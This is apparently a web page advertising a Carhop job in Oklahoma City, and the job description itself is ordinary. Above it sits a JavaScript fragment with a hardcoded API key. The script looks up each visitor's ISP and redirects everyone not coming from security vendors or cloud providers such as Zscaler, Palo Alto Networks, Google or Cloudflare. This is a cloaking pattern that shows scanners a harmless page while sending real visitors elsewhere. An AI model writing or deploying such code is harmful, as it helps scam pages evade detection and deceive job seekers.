Carhop Team Member
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Carhop Team Member in Oklahoma City, OK!
As a Carhop, you'll provide friendly, efficient service to customers by taking orders, delivering food and beverages to vehicles, and ensuring a positive dining experience.
Responsibilities include:
- Greeting customers with a friendly attitude
- Taking and relaying food orders accurately
- Delivering orders promptly to parked vehicles
- Handling customer inquiries and resolving issues professionally
- Maintaining cleanliness of work area and serving utensils
- Assisting with general restaurant duties as needed
Skills needed:
- Excellent communication and customer service skills
- Ability to work in a fast-paced environment
- Team player with a positive attitude
- Attention to detail and reliability
- Ability to stand and walk for extended periods
Benefits include:
- Flexible scheduling
- Competitive pay
- Employee discounts
- Opportunity for growth and advancement
- Fun, team-oriented work environment